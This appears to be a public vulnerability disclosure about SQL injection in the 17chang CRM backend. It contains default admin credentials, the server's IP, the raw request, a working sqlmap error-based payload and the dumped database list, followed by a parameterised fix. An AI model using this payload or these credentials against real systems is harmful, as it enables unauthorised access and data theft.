2015-11-09: Details have been reported to the vendor and are awaiting vendor handling.
2015-11-22: The vendor has proactively ignored the vulnerability; details are disclosed to the public.
23333333
http://crm.17chang.com/ account: admin password: admin
The backend's SQL anti-injection protection isn't turned on at all. I grabbed a random request and ran the POST packet:
POST /crm-server/rest/userservice/users/query HTTP/1.1
Host: 121.40.218.177:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/json; charset=utf-8
Referer: http://crm.17chang.com/content.html
Content-Length: 116
Origin: http://crm.17chang.com
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{"area_equals":"","city_equals":"","title_equals":"","username_like":"*","phonenum_equals":"","enabled_equals":null}
Then I checked the current privileges: it is actually DBA!!!!
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: {"area_equals":"","city_equals":"","title_equals":"","username_like":"' AND (SELECT 3255 FROM(SELECT COUNT(*),CONCAT(0x71707a7871,(SELECT (ELT(3255=3255,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rNlG'='rNlG","phonenum_equals":"","enabled_equals":null}
---
[14:22:37] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[14:22:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[14:22:37] [INFO] fetching database names
[14:22:37] [INFO] the SQL query used returns 10 entries
[14:22:37] [INFO] starting 10 threads
[14:22:38] [INFO] retrieved: mysql
[14:22:38] [INFO] retrieved: test
[14:22:38] [INFO] retrieved: oms_dev
[14:22:38] [INFO] retrieved: mlm_dev
[14:22:38] [INFO] retrieved: information_schema
[14:22:38] [INFO] retrieved: crm_dev
[14:22:38] [INFO] retrieved: pms_dev
[14:22:38] [INFO] retrieved: yqc
[14:22:38] [INFO] retrieved: yqc_test
[14:22:38] [INFO] retrieved: yqc_initdata
available databases [10]:
[*] crm_dev
[*] information_schema
[*] mlm_dev
[*] mysql
[*] oms_dev
[*] pms_dev
[*] test
[*] yqc
[*] yqc_initdata
[*] yqc_test
[14:22:38] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[14:22:38] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\121.40.218.177'
[*] shutting down at 14:22:38
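The injection rides on the `username_like` field of the JSON body, which the backend evidently splices into a LIKE clause. As an added example (not the vendor's code), this is how a parameterised version of that query handler would bind every filter value, translate the API's `*` wildcard into LIKE and escape the SQL wildcards so the sqlmap payload above can only ever match literally; the users table, its columns and the sqlite3 backend are assumptions standing in for the real MySQL schema.

```python
import json
import sqlite3


def build_db():
    """Constructed sample table standing in for the CRM user table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, phonenum TEXT, city TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin", "13800000000", "Hangzhou"),
        ("alice_w", "13900000000", "Shanghai"),
        ("bob", "13700000000", "Beijing"),
    ])
    return conn


def like_pattern(value):
    """Turn the API's '*' wildcard into SQL '%' and escape '%', '_' and '\\'
    so nothing else in the user-supplied string acts as a wildcard."""
    escaped = (value.replace("\\", "\\\\")
                    .replace("%", "\\%")
                    .replace("_", "\\_"))
    return escaped.replace("*", "%")


def query_users(conn, body):
    """Parameterised handler for the /users/query body: filter values are bound
    parameters, never concatenated, so payload text is data to the SQL parser."""
    filters = json.loads(body)
    clauses, params = [], []
    if filters.get("username_like"):
        clauses.append("username LIKE ? ESCAPE '\\'")
        params.append(like_pattern(filters["username_like"]))
    # Column names come from this fixed mapping, not from the request.
    for field, column in (("phonenum_equals", "phonenum"), ("city_equals", "city")):
        if filters.get(field):
            clauses.append(f"{column} = ?")
            params.append(filters[field])
    sql = "SELECT username FROM users"
    if clauses:
        sql += " WHERE " + " AND ".join(clauses)
    sql += " ORDER BY username"
    return [row[0] for row in conn.execute(sql, params)]
```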
Severity: no impact, vendor ignored
Ignored at: 2015-11-22 13:34
Vulnerability Rank: 4 (WooYun rating)
None yet.